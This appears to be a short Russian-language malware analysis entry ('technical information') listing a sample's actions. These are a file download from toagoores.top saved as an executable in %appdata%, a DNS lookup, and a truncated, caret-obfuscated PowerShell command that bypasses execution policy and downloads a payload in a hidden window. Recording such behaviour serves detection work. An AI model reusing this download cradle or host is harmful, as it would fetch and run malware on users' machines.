Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^ErshELL^.^E^Xe ^-Ex^E^C^UtioN^p^o^Li^Cy ^BY^PAss ^-Nop^r^Of^IL^e^ -Win^doWStyL^E h^iddEN (n^eW-^o^Bj^ec^t s^yS^TeM.n^E^T.w^EBCL^iE^nt)^.d^oW^n^loa^Dfil^e(^'http://toagoores...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "poW^ErshELL^.^E^Xe ^-Ex^E^C^UtioN^p^o^Li^Cy ^BY^PAss ^-Nop^r^Of^IL^e^ -Win^doWStyL^E h^iddEN (n^eW-^o^Bj^ec^t s^yS^TeM.n^E^T.w^EBCL^iE^nt)^.d^oW^n^loa^Dfil^e(^'http://toagoores...' (со скрытым окном)